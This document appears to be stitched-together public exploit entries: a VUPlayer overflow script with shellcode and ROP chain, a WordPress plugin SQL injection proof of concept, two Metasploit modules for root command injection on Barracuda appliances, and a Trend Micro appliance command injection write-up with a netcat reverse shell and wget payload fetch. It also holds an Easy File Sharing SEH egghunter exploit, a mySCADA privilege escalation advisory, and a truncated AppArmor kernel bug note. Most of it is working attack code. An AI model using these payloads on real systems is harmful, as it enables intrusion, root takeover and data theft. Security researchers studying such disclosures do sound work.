buf += "\x15\xe3\xa8\xed\xa6\xc5\x74\xa1\x65\x47\x09\xbb\xb9"
buf += "\xa7\x30\x74\xcc\xa6\x75\x68\x3f\xfa\x2e\xe7\x92\xeb"
buf += "\x5b\xb5\x2e\x0d\x8c\xb2\x0f\x75\xa9\x04\xfb\xcf\xb0"
buf += "\x54\x54\x5b\xfa\x4c\xde\x03\xdb\x6d\x33\x50\x27\x24"
buf += "\x38\xa3\xd3\xb7\xe8\xfd\x1c\x86\xd4\x52\x23\x27\xd9"
buf += "\xab\x63\x8f\x02\xde\x9f\xec\xbf\xd9\x5b\x8f\x1b\x6f"
buf += "\x7e\x37\xef\xd7\x5a\xc6\x3c\x81\x29\xc4\x89\xc5\x76"
buf += "\xc8\x0c\x09\x0d\xf4\x85\xac\xc2\x7d\xdd\x8a\xc6\x26"
buf += "\x85\xb3\x5f\x82\x68\xcb\x80\x6a\xd4\x69\xca\x98\x01"
buf += "\x0b\x91\xf6\xd4\x99\xaf\xbf\xd7\xa1\xaf\xef\xbf\x90"
buf += "\x24\x60\xc7\x2c\xef\xc5\x37\x67\xb2\x6f\xd0\x2e\x26"
buf += "\x32\xbd\xd0\x9c\x70\xb8\x52\x15\x08\x3f\x4a\x5c\x0d"
buf += "\x7b\xcc\x8c\x7f\x14\xb9\xb2\x2c\x15\xe8\xd0\xb3\x85"
buf += "\x70\x39\x56\x2e\x12\x45"
rop = "\xe7\x5f\x01\x10" #POP EAX # RETN [BASS.dll]
rop += "\x5c\xe2\x60\x10" #ptr to &VirtualProtect() [IAT BASSMIDI.dll]
rop += "\xf1\xea\x01\x10" #MOV EAX,DWORD PTR DS:[EAX] # RTN [BASS.dll]
rop += "\x50\x09\x03\x10" #XCHG EAX,ESI # RETN [BASS.dll]
rop += "\x0c\x80\x60\x10" #POP EBP # RETN 0x0C [BASSMIDI.dll]
rop += "\x9f\x53\x10\x10" #& jmp esp BASSWMA.dll
rop += "\xe7\x5f\x01\x10" #POP EAX # RETN [BASS.dll]
rop += "\x90"*12
rop += "\xff\xfd\xff\xff" #201 in negative
rop += "\xb4\x4d\x01\x10" #NEG EAX # RETN [BASS.dll]
rop += "\x72\x2f\x03\x10" #XCHG EAX,EBX # RETN [BASS.dll]
rop += "\xe7\x5f\x01\x10" #POP EAX # RETN [BASS.dll]
rop += "\xc0\xff\xff\xff" #40 in negative
rop += "\xb4\x4d\x01\x10" #NEG EAX # RETN [BASS.dll]
rop += "\x6c\x8a\x03\x10" #XCHG EAX,EDX # RETN [BASS.dll]
rop += "\x07\x10\x10\x10" #POP ECX # RETN [BASSWMA.dll]
rop += "\x93\x83\x10\x10" #&Writable location [BASSWMA.dll]
rop += "\x04\xdc\x01\x10" #POP EDI # RETN [BASS.dll]
rop += "\x84\xa0\x03\x10" #RETN [BASS.dll]
rop += "\xe7\x5f\x01\x10" #POP EAX # RETN [BASS.dll]
rop += "\x90"*4
rop += "\xa5\xd7\x01\x10" #PUSHAD # RETN [BASS.dll]
exploit = "\x41"*1012 + rop + "\x90"*8 + buf
print "len + " + str(len(rop))
file = open('/root/Desktop/exploit_development/VUPlayer/boom.pls','w')
file.write(exploit)
file.close()
mySCADAProv7 Local Privilege Escalation
Vendor: mySCADA Technologies s.r.o.
Product web page: https://www.myscada.org/
Affected application: myscadaPro
Affected version: v7 (Current version)
Vulnerability discovered by: Karn Ganeshen
Description:
myscadaPro7 application installs seven (8) services. All these services run as LocalSystem by default, and suffer from an unquoted search path issue. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system.
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user’s code would execute with the elevated privileges of the application.
Tested on:
Microsoft Windows Vista Ultimate SP2 (EN)
Details
The following services have insecurely quoted paths:
1. Bonjour Service (Bonjour Service) runs as LocalSystem and has path: C:\Program Files\mySCADA\bin\mDNSResponder.exe:
2. myalerting (myalerting) runs as LocalSystem and has path: C:\Program Files\mySCADA\bin\mySCADAservice.exe "\"C:\Program Files\mySCADA\bin\myalerting.exe\" -c \"C:\ProgramData\mySCADA\myscada.conf\" -m \"C:\ProgramData\mySCADA\msmtp.conf\" -s \"C:\ProgramData\mySCADA\sms.conf\" ":
3. myscadacom (myscadacom) runs as LocalSystem and has path: C:\Program Files\mySCADA\bin\mySCADAservice.exe "\"C:\Program Files\mySCADA\bin\myscadacom.exe\" -c \"C:\ProgramData\mySCADA\myscada.conf\" ":
4. myscadadb (myscadadb) runs as LocalSystem and has path: C:\Program Files\mySCADA\bin\mySCADAservice.exe "\"C:\Program Files\mySCADA\bin\myscadadb.exe\" -c \"C:\ProgramData\mySCADA\myscada.conf\" ":
5. myscadagate (myscadagate) runs as LocalSystem and has path: C:\Program Files\mySCADA\bin\mySCADAservice.exe "\"C:\Program Files\mySCADA\bin\myscadagate.exe\" -f \"C:\ProgramData\mySCADA\myscada.conf\" ":
6. myscadahmi (myscadahmi) runs as LocalSystem and has path: C:\Program Files\mySCADA\bin\mySCADAservice.exe "\"C:\Program Files\mySCADA\bin\myscadahmi.exe\" -p \"C:\Program Files\mySCADA\" -c \"conf\hmi.conf\" ":
7. myscadalog (myscadalog) runs as LocalSystem and has path: C:\Program Files\mySCADA\bin\mySCADAservice.exe "\"C:\Program Files\mySCADA\bin\myscadalog.exe\" -c \"C:\ProgramData\mySCADA\myscada.conf\" ":
8. myscadascr (myscadascr) runs as LocalSystem and has path: C:\Program Files\mySCADA\bin\mySCADAservice.exe "\"C:\Program Files\mySCADA\bin\node.exe\" \"C:\Program Files\mySCADA\bin\scripts\scripts.js\" -c \"C:\ProgramData\mySCADA\myscada.conf\" -a 1 ":
# Exploit Title: Wordpress Ultimate-Product-Catalog <= 3.9.8 (do_shortcode via ajax) Unsanitized shortcode attributes - Unauthenticated Blind SQL Injection
# Date: 2016-07-28
# Google Dork: "Index of /wp-content/plugins/ultimate-product-catalogue/"
# Exploit Author: Joaquin Ramirez Martinez [ i0 SEC-LABORATORY ]
# Vendor Homepage: http://www.EtoileWebDesign.com/
# plugin uri: http://www.EtoileWebDesign.com/ultimate-product-catalogue/
# Software Link:
# Version: <=3.9.8
# Tested on: windows 7 + firefox.
====================
DESCRIPTION
====================
A vulnerability has been discvered in the wordpress Ultimate Product Catalog by affecting v3.9.8 and below (tested).
Due to a unsanitized parameters passed to the shorcode function `Insert_Product_Catalog` [ "product-catalogue" ]
located in `/Funtions/Shortcodes.php` line 4:
function Insert_Product_Catalog($atts) {
// Select the catalogue information from the database
...
$Catalogue = $wpdb->get_row("SELECT * FROM $catalogues_table_name WHERE Catalogue_ID=" . $id);
$CatalogueItems = $wpdb->get_results("SELECT * FROM $catalogue_items_table_name WHERE Catalogue_ID=" . $id . " ORDER BY Position");
...
return $ProductString;
}
The $id parameter is extracted with `extract` function from $atts. This is a vulnerability with which can be exploited by creating shortcodes with
malicious attributes, exploitable only by administrators, editors, authors. But in file `/Functions/Process_Ajax.php` line 113...
function UPCP_Filter_Catalogue() {
$Path = ABSPATH . 'wp-load.php';
include_once($Path);
$id = $_POST['id']; <-- we can control this value!!
...
echo do_shortcode("[product-catalogue id='" . $id . "' only_inner='Yes' starting_layout='" . $start_layout . "' excluded_layouts='" . $exclude_layouts . "' current_page='" . $current_page . "' ajax_reload='" . $ajax_reload . "' ajax_url='" . $ajax_url . "' request_count='" . $request_count . "' category='" . $Category . "' subcategory='" . $SubCategory . "' tags='" . $Tags . "' custom_fields='" . $Custom_Fields . "' prod_name='" . $Prod_Name . "' min_price='" . $Min_Price . "' max_price='" . $Max_Price . "']");
}
This is interesting because that function calls `do_shortcode` executing the shortcode 'product-catalogue' as a result, this calls `Insert_Product_Catalog` wich
I found the SQLi, now we need to found a place where ` UPCP_Filter_Catalogue` is called and in line 138-139 i found...
...
add_action('wp_ajax_update_catalogue', 'UPCP_Filter_Catalogue');
add_action( 'wp_ajax_nopriv_update_catalogue', 'UPCP_Filter_Catalogue');
...
this means that we can execute that function only with a request to `/wp-admin/admin-ajax.php?action=update_catalogue` and send the vulnerable $id parameter
with our custom payload. Note that `wp_ajax_nopriv` prefix makes this vulnerability exploitable by unauthenticated users.
Example:
http://<wp-host>/<wp-path>/wp-admin/admin-ajax.php?action=update_catalogue
POSTDATA: id=0+or+(our+custom+select+here)+--
An attacker can exploit this vulnerability and compromise all user records or take over control of the host machine.
==============
POC
==============
-----------------
//REQUEST
------------------
POST /wordpress/wp-admin/admin-ajax.php?action=update_catalogue HTTP/1.1
Host: localhost
Content-Length: 21
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: es-ES,es;q=0.8
Cookie:
id=1+OR+SLEEP(10)+--+
--------------------------
EXPLOITING WITH SQLMAP
------------------------
sqlmap --url="http://<wp-host>/<wp-path>/wp-admin/admin-ajax.php?action=update_catalogue" --data="id=1" --level=5 --risk=3 --technique=B -p id --dbs --dbms=mysql
(listing all available databases)
==================================
time-line
===================================
2016-07-28: reported to vendor.
2016-07-28: vendor released plugin version 3.9.9. saying in changelog "Minor ajax update to switch to a prepared statement".
2016-07-29: public disclousure.
===================================
# Exploit Title: Barracuda Web App Firewall/Load Balancer Post Auth Remote Root Exploit (3)
# Date: 07/28/16
# Exploit Author: xort xort@blacksecurity.org
# Vendor Homepage: https://www.barracuda.com/
# Software Link: https://www.barracuda.com/products/loadbalance & https://www.barracuda.com/products/webapplicationfirewall
# Version: Load Balancer Firmware <= v5.4.0.004 (2015-11-26) & Web App Firewall Firmware <= 8.0.1.008 (2016-03-22)
# Tested on: Load Balancer Firmware <= v5.4.0.004 (2015-11-26) & Web App Firewall Firmware <= v8.0.1.008 (2016-03-22)
# CVE : None.
# vuln: UPDATE_va_other_options trigger exploit
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Barracuda Web App Firewall/Load Balancer Post Auth Remote Root Exploit (3)',
'Description' => %q{
This module exploits a remote command execution vulnerability in the Barracuda Web App Firewall
Firmware Version <= 8.0.1.008 and Load Balancer Firmware <= v5.4.0.004 by exploiting a vulnerability
in the web administration interface. By sending a specially crafted request it's possible to inject
system commands while escalating to root do to relaxed sudo configurations on the applianaces.
},
'Author' =>
[
'xort', # vuln + metasploit module
],
'Version' => '$Revision: 2 $',
'References' =>
[
[ 'none', 'none'],
],
'Platform' => [ 'linux'],
'Privileged' => true,
'Arch' => [ ARCH_X86 ],
'SessionTypes' => [ 'shell' ],
'Privileged' => false,
'Payload' =>
{
'Compat' =>
{
'ConnectionType' => 'find',
}
},
'Targets' =>
[
['Barracuda Web App Firewall Firmware Version <= 8.0.1.008 (2016-03-22)',
{
'Arch' => ARCH_X86,
'Platform' => 'linux',
'SudoCmdExec' => "/home/product/code/firmware/current/bin/config_agent_wrapper.pl"
}
],
['Barracuda Load Balancer Firmware <= v5.4.0.004 (2015-11-26)',
{
'Arch' => ARCH_X86,
'Platform' => 'linux',
'SudoCmdExec' => "/home/product/code/firmware/current/bin/rdpd"
}
],
],
'DefaultTarget' => 0))
register_options(
[
OptString.new('PASSWORD', [ false, 'Device password', "" ]),
OptString.new('ET', [ false, 'Device password', "" ]),
OptString.new('USERNAME', [ true, 'Device password', "admin" ]),
OptString.new('CMD', [ false, 'Command to execute', "" ]),
Opt::RPORT(8000),
], self.class)
end
def do_login(username, password_clear, et)
vprint_status( "Logging into machine with credentials...\n" )
# vars
timeout = 1550;
enc_key = Rex::Text.rand_text_hex(32)
# send request
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "/cgi-mod/index.cgi",
'headers' =>
{
'Accept' => "application/json, text/javascript, */*; q=0.01",
'Content-Type' => "application/x-www-form-urlencoded",
'X-Requested-With' => "XMLHttpRequest"
},
'vars_post' =>
{
'enc_key' => enc_key,
'et' => et,
'user' => "admin", # username,
'password' => "admin", # password_clear,
'enctype' => "none",
'password_entry' => "",
'login_page' => "1",
'login_state' => "out",
'real_user' => "",
'locale' => "en_US",
'form' => "f",
'Submit' => "Sign in",
}
}, timeout)
# get rid of first yank
password = res.body.split('\n').grep(/(.*)password=([^&]+)&/){$2}[0] #change to match below for more exact result
et = res.body.split('\n').grep(/(.*)et=([^&]+)&/){$2}[0]
return password, et
end
def run_command(username, password, et, cmd)
vprint_status( "Running Command...\n" )
# file to replace
sudo_cmd_exec = target['SudoCmdExec']
#sudo_cmd_exec = "/home/product/code/firmware/current/bin/config_agent_wrapper.pl"
#sudo_cmd_exec = "/home/product/code/firmware/current/bin/rdpd"
sudo_run_cmd_1 = "sudo /bin/cp /bin/sh #{sudo_cmd_exec} ; sudo /bin/chmod +x #{sudo_cmd_exec}"
sudo_run_cmd_2 = "sudo #{sudo_cmd_exec} -c "
# random filename to dump too + 'tmp' HAS to be here.
b64dumpfile = "/tmp/" + rand_text_alphanumeric(4+rand(4))
vprint_status(" file = " + b64dumpfile)
# decoder stubs - tells 'base64' command to decode and dump data to temp file
b64decode1 = "echo \""
b64decode2 = "\" | base64 -d >" + b64dumpfile
# base64 - encode with base64 so we can send special chars and multiple lines
cmd = Base64.strict_encode64(cmd)
# Create injection string.
# a) package the base64 decoder with encoded bytes
# b) attach a chmod +x request to make the script created (b64dumpfile) executable
# c) execute decoded base64 dumpfile
injection_string = b64decode1 + cmd + b64decode2 + "; /bin/chmod +x " + b64dumpfile + "; " + sudo_run_cmd_1 + "; " + sudo_run_cmd_2 + b64dumpfile # + " ; rm " + b64dumpfile
exploitreq = [
[ "auth_type","Local" ],
[ "et",et ],
[ "locale","en_US" ],
[ "password", password ],
[ "primary_tab", "ADVANCE" ],
[ "realm","" ],
[ "secondary_tab","advanced_system" ],
[ "user", username ],
[ "timestamp", Time.now.to_i ],
[ "UPDATE_va_other_options", "1" ],
[ "UPDATE_scan_information_in_use", "xx; #{injection_string}" ] # vuln
]
boundary = "---------------------------" + Rex::Text.rand_text_numeric(34)
post_data = ""
exploitreq.each do |xreq|
post_data << "--#{boundary}\r\n"
post_data << "Content-Disposition: form-data; name=\"#{xreq[0]}\"\r\n\r\n"
post_data << "#{xreq[1]}\r\n"
end
post_data << "--#{boundary}--\r\n"
res = send_request_cgi({
'method' => 'POST',
'uri' => "/cgi-mod/index.cgi",
'ctype' => "multipart/form-data; boundary=#{boundary}",
'data' => post_data,
'headers' =>
{
'UserAgent' => "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0",
}
})
end
def run_script(username, password, et, cmds)
vprint_status( "running script...\n")
end
def exploit
# timeout
timeout = 1550;
user = "admin"
# params
real_user = "";
login_state = "out"
et = Time.now.to_i
locale = "en_US"
user = "admin"
password = "admin"
enctype = "MD5"
password_entry = ""
password_clear = "admin"
if not datastore['PASSWORD'].nil? and not datastore['PASSWORD'].empty?
password_clear = datastore['PASSWORD']
password = datastore['PASSWORD']
# et = datastore['ET']
end
password_hash, et = do_login(user, password_clear, et)
vprint_status("new password: #{password_hash} et: #{et}\n")
sleep(5)
#if no 'CMD' string - add code for root shell
if not datastore['CMD'].nil? and not datastore['CMD'].empty?
cmd = datastore['CMD']
# Encode cmd payload
encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
# kill stale calls to bdump from previous exploit calls for re-use
run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/n ;printf \"#{encoded_cmd}\" > /tmp/n; chmod +rx /tmp/n ; /tmp/n" ))
else
# Encode payload to ELF file for deployment
elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
run_command(user, password_hash, et, ("printf \"#{encoded_elf}\" > /tmp/m; chmod +rx /tmp/m ; /tmp/m" ))
handler
end
end
end
# Exploit Title: Barracuda Web Application Firewall <= v8.0.1.008 Post Auth Remote Root Exploit
# Date: 07/28/16
# Exploit Author: xort xort@blacksecurity.org
# Vendor Homepage: https://www.barracuda.com/
# Software Link: https://www.barracuda.com/products/webapplicationfirewall
# Version: Web App Firewall Firmware <= 8.0.1.008 (2016-03-22)
# Tested on: Web App Firewall Firmware <= v8.0.1.008 (2016-03-22)
# CVE : None.
# vuln: interface_stats
require 'msf/core'
require 'date'
require "base64"
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Barracuda Web Application Firewall <= v8.0.1.008 Post Auth Root Exploit',
'Description' => %q{
This module exploits a remote command execution vulnerability in the Barracuda Web
Application Firweall firmware versions <= v8.0.1.008 (2016-03-22) by exploiting a
vulnerability in the web administration interface. By sending a specially crafted
request it's possible to inject system commands while escalating to root do to relaxed
sudo configuration on the local machine.
},
'Author' => [ 'xort' ], # disclosure and exploit module
'References' => [ [ 'none', 'none'] ],
'Platform' => [ 'linux'],
'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
'Targets' => [['Web Application Firewall <= v8.0.1.008 (2016-03-22)', {}]],
'DefaultTarget' => 0 ))
register_options(
[
OptString.new('PASSWORD', [ false, 'Password', "admin" ]),
OptString.new('USERNAME', [ true, 'Admin Username', "admin" ]),
OptString.new('CMD', [ false, 'Command to execute', "" ]),
Opt::RPORT(8000),
], self.class)
end
def do_login(username, password_clear, et)
vprint_status( "Logging into machine with credentials...\n" )
# vars
timeout = 1550;
enc_key = Rex::Text.rand_text_hex(32)
# send request
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "/cgi-mod/index.cgi",
'headers' =>
{
'Accept' => "application/json, text/javascript, */*; q=0.01",
'Content-Type' => "application/x-www-form-urlencoded",
'X-Requested-With' => "XMLHttpRequest"
},
'vars_post' =>
{
'enc_key' => enc_key,
'et' => et,
'user' => "admin", # username,
'password' => "admin", # password_clear,
'enctype' => "none",
'password_entry' => "",
'login_page' => "1",
'login_state' => "out",
'real_user' => "",
'locale' => "en_US",
'form' => "f",
'Submit' => "Sign in",
}
}, timeout)
# get rid of first yank
password = res.body.split('\n').grep(/(.*)password=([^&]+)&/){$2}[0] #change to match below for more exact result
et = res.body.split('\n').grep(/(.*)et=([^&]+)&/){$2}[0]
return password, et
end
def run_command(username, password, et, cmd)
# file to replace
sudo_cmd_exec = "/home/product/code/firmware/current/bin/config_agent_wrapper.pl"
sudo_run_cmd_1 = "sudo /bin/cp /bin/sh #{sudo_cmd_exec} ; sudo /bin/chmod +x #{sudo_cmd_exec}"
sudo_run_cmd_2 = "sudo #{sudo_cmd_exec} -c "
vprint_status( "Running Command...\n" )
# random filename to dump too + 'tmp' HAS to be here.
b64dumpfile = "/tmp/" + rand_text_alphanumeric(4+rand(4))
# decoder stubs - tells 'base64' command to decode and dump data to temp file
b64decode1 = "echo \""
b64decode2 = "\" | base64 -d >" + b64dumpfile
# base64 - encode with base64 so we can send special chars and multiple lines
cmd = Base64.strict_encode64(cmd)
# Create injection string.
# a) package the base64 decoder with encoded bytes
# b) attach a chmod +x request to make the script created (b64dumpfile) executable
# c) execute decoded base64 dumpfile
injection_string = b64decode1 + cmd + b64decode2 + "; /bin/chmod +x " + b64dumpfile + "; " + sudo_run_cmd_1 + "; " + sudo_run_cmd_2 + b64dumpfile + " ; rm " + b64dumpfile
# injection_string = b64decode1 + cmd + b64decode2 + "; /bin/chmod +x " + b64dumpfile + "; " + sudo_run_cmd_1 + "; " + sudo_run_cmd_2 + b64dumpfile
vprint_status( "sending..." )
res = send_request_cgi({
'method' => 'GET',
'uri' => "/cgi-mod/index.cgi",
'headers' =>
{
'UserAgent' => "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0",
},
'vars_get' => {
'ajax_action' => 'interface_stats',
'user' => username,
'password' => password,
'et' => et,
'locale' => 'en_US',
'realm' => '',
'auth_type' => 'Local',
'primary_tab' => 'BASIC',
'secondary_type' => 'status',
'interface' => 'eth0' + '| ' + injection_string + ' |echo ' # vuln
}
})
end
def exploit
# params
timeout = 1550;
real_user = "";
et = Time.now.to_i
user = datastore['USERNAME']
password = datastore['PASSWORD']
# do login and get password hash
password_hash, et = do_login(user, password, et)
vprint_status("got password hash: #{password_hash}\n")
sleep(2)
#if no 'CMD' string - add code for root shell
if not datastore['CMD'].nil? and not datastore['CMD'].empty?
cmd = datastore['CMD']
# Encode cmd payload
encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
# kill stale calls to bdump from previous exploit calls for re-use
run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/n ;printf \"#{encoded_cmd}\" > /tmp/n; chmod +rx /tmp/n ; /tmp/n" ))
else
# Encode payload to ELF file for deployment
elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
# kill stale calls to bdump from previous exploit calls for re-use
run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/m ;printf \"#{encoded_elf}\" > /tmp/m; chmod +rx /tmp/m ; /tmp/m" ))
handler
end
end
end
Version: TDA 2.6.1062r1
Summary:
The hotfix_upload.cgi file contains a flaw allowing a user to execute commands under the context of the root user.
Details:
The hotfix_upload.cgi file is used to upload files (hot fixes). Below is a sample of the upload function being used:
POST /cgi-bin/hotfix_upload.cgi?sID=hotfix_temp HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: https://<server IP>/cgi-bin/hotfix_history.cgi
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Content-Type: multipart/form-data; boundary=—————————7e0823930136
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: <server IP>
Content-Length: 206
Connection: close
Cache-Control: no-cache
Cookie: session_id=
—————————–7e0823930136
Content-Disposition: form-data; name=”ajaxuploader_file”; filename=”test.txt”
Content-Type: text/plain
a
—————————–7e0823930136–
The actual injection takes place in the name of the file being uploaded (ie. filename=”test.txt&id”). By performing the following request, system information is sent back in the response:
http://www.korpritzombie.com/wp-content/uploads/2016/07/1.png
This gives any user the ability to execute simple non interactive commands. However, more complex (including remote shell) commands are possible.
Special characters like ‘/’,'<‘,’>’ are not sent across to the server. But utilizing the environment itself, it becomes possible to insert characters like the ‘/’. Below is an example of a user using this method to retrieve the /etc/passwd file (NOTE: `echo $PATH | cut -c1` will print ‘/‘ to the final command):
http://www.korpritzombie.com/wp-content/uploads/2016/07/2.png
Now the attacker has the ability to create a shell by uploading a file containing the following (where [ip address] is your receiving machine):
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [ip address] 5555 >/tmp/f
To upload the file, the attacker simply names this file to shell, then uploads using this vulnerability and wget:
test.txt&wget http:`echo $PATH | cut -c1“echo $PATH | cut -c1`[ip]`echo $PATH | cut -c1`shell
Once the file has been uploaded (it will be placed in /opt/TrendMicro/MinorityReport/www/cgi-bin), the attacker can chmod and then execute the file as a script, creating a reverse shell, running as root:
test.xml&chmod a+x shell
test.xml&.`echo $PATH | cut -c1`shell
#!/usr/bin/python
# Exploit Title: Easy File Sharing Web Server 7.2 SEH Overflow with Egghunter
# Date: July 29, 2016
# Exploit Author: ch3rn0byl
# Vendor Homepage: http://www.sharing-file.com/
# Software Link: http://www.sharing-file.com/download.php
# Version: 7.2
# Tested on: Windows 7, 8, 8.1, 10
# Admin privileges anyone?? hehe ;)
from socket import socket, AF_INET, SOCK_STREAM
from sys import argv
from struct import pack
from time import sleep
from subprocess import call
host = argv[1]
rekt = ""
rekt += "\x93\x93\x48\xf5\x93\x93\x90\xf9\x90\x37\x4a\x48\x90"
rekt += "\x99\x9b\x37\x98\x9f\xfc\xd6\xbd\x71\xab\x9a\xbc\xdb"
rekt += "\xd0\xd9\x74\x24\xf4\x5f\x29\xc9\xb1\x53\x31\x6f\x12"
rekt += "\x83\xef\xfc\x03\x1e\xa5\x78\x49\x1c\x51\xfe\xb2\xdc"
rekt += "\xa2\x9f\x3b\x39\x93\x9f\x58\x4a\x84\x2f\x2a\x1e\x29"
rekt += "\xdb\x7e\x8a\xba\xa9\x56\xbd\x0b\x07\x81\xf0\x8c\x34"
rekt += "\xf1\x93\x0e\x47\x26\x73\x2e\x88\x3b\x72\x77\xf5\xb6"
rekt += "\x26\x20\x71\x64\xd6\x45\xcf\xb5\x5d\x15\xc1\xbd\x82"
rekt += "\xee\xe0\xec\x15\x64\xbb\x2e\x94\xa9\xb7\x66\x8e\xae"
rekt += "\xf2\x31\x25\x04\x88\xc3\xef\x54\x71\x6f\xce\x58\x80"
rekt += "\x71\x17\x5e\x7b\x04\x61\x9c\x06\x1f\xb6\xde\xdc\xaa"
rekt += "\x2c\x78\x96\x0d\x88\x78\x7b\xcb\x5b\x76\x30\x9f\x03"
rekt += "\x9b\xc7\x4c\x38\xa7\x4c\x73\xee\x21\x16\x50\x2a\x69"
rekt += "\xcc\xf9\x6b\xd7\xa3\x06\x6b\xb8\x1c\xa3\xe0\x55\x48"
rekt += "\xde\xab\x31\xbd\xd3\x53\xc2\xa9\x64\x20\xf0\x76\xdf"
rekt += "\xae\xb8\xff\xf9\x29\xbe\xd5\xbe\xa5\x41\xd6\xbe\xec"
rekt += "\x85\x82\xee\x86\x2c\xab\x64\x56\xd0\x7e\x10\x5e\x77"
rekt += "\xd1\x07\xa3\xc7\x81\x87\x0b\xa0\xcb\x07\x74\xd0\xf3"
rekt += "\xcd\x1d\x79\x0e\xee\xf5\x4b\x87\x08\x9f\xbb\xc1\x83"
rekt += "\x37\x7e\x36\x1c\xa0\x81\x1c\x34\x46\xc9\x76\x83\x69"
rekt += "\xca\x5c\xa3\xfd\x41\xb3\x77\x1c\x56\x9e\xdf\x49\xc1"
rekt += "\x54\x8e\x38\x73\x68\x9b\xaa\x10\xfb\x40\x2a\x5e\xe0"
rekt += "\xde\x7d\x37\xd6\x16\xeb\xa5\x41\x81\x09\x34\x17\xea"
rekt += "\x89\xe3\xe4\xf5\x10\x61\x50\xd2\x02\xbf\x59\x5e\x76"
rekt += "\x6f\x0c\x08\x20\xc9\xe6\xfa\x9a\x83\x55\x55\x4a\x55"
rekt += "\x96\x66\x0c\x5a\xf3\x10\xf0\xeb\xaa\x64\x0f\xc3\x3a"
rekt += "\x61\x68\x39\xdb\x8e\xa3\xf9\xeb\xc4\xe9\xa8\x63\x81"
rekt += "\x78\xe9\xe9\x32\x57\x2e\x14\xb1\x5d\xcf\xe3\xa9\x14"
rekt += "\xca\xa8\x6d\xc5\xa6\xa1\x1b\xe9\x15\xc1\x09"
# Our tag is hive: \x68\x69\x76\x65
egghunter = ''
egghunter += '\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c'
egghunter += '\x05\x5a\x74\xef\xb8\x68\x69\x76\x65\x8b\xfa\xaf\x75'
egghunter += '\xea\xaf\x75\xe7\xff\xe7'
crash = "A" * 4061
crash += pack('<L', 0x909006eb)
crash += pack('<L', 0x10019ce3)
crash += egghunter
crash += "D" * (5500 - 4061 - 8 - len(egghunter))
payload = 'GET {} HTTP/1.0\r\n\r\n'.format(crash)
payload += 'hivehive'
payload += rekt
payload += 'E' * (800 - len(rekt))
print '[+] Trying to exploit {}...'.format(host)
try:
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, 80))
print '[+] Sending payload...'
s.send(payload)
s.close()
print '[+] Trying to connect to target...\n'
try:
sleep(2)
call(['ncat', host, '54321'])
except:
print '[!] Whoops!! Something went wrong?'
except:
print '[!] Whoops!! Something went wrong?'
finally:
print '\n[+] I <3 SHELLS'
/*
There's a reference count leak in aa_fs_seq_hash_show that can be used to overflow the reference counter and trigger a kernel use-after-free
static int aa_fs_seq_hash_show(struct seq_file *seq, void *v)
{
struct aa_replacedby *r = seq->private;
struct aa_profile *profile = aa_get_profile_rcu(&r->profile); // <--- takes a reference on profile
unsigned int i, size = aa_hash_size();
if (profile->hash) {
for (i = 0; i < size; i++)
seq_printf(seq, "%.2x", profile->hash[i]);
seq_puts(seq, "\n");
}
return 0;
} // <-- no reference dropped
See attached for a PoC that triggers a use-after-free on an aa_label object on Ubuntu 15.10 with the latest 4.2.0.35 kernel; the Ubuntu kernel appears to use an older version of AppArmor prior to some refactoring, but the same issue is present.
static int aa_fs_seq_hash_show(struct seq_file *seq, void *v)
{
struct aa_replacedby *r = seq->private;
struct aa_label *label = aa_get_label_rcu(&r->label); // <--- takes a reference on label
struct aa_profile *profile = labels_profile(label);
unsigned int i, size = aa_hash_size();
if (profile->hash) {
for (i = 0; i < size; i++)
seq_printf(seq, "%.2x", profile->hash[i]);
seq_puts(seq, "\n");
}
return 0;
} // <--- no reference dropped
I noticed in reproducing this issue that it appears that there has been a patch applied to the very latest Ubuntu kernel shipped in 16.04 that fixes this that hasn't been upstreamed or backported.
The fix is just to correctly drop the acquired reference.
index ad4fa49..798d492 100644
--- a/security/apparmor/apparmorfs.c
+++ b/security/apparmor/apparmorfs.c
@@ -331,6 +331,7 @@ static int aa_fs_seq_hash_show(struct seq_file *seq, void *v)
seq_printf(seq, "%.2x", profile->hash[i]);
seq_puts(seq, "\n");
}
+ aa_put_profile(profile);
return 0;
}
*/
#include <unistd.h>
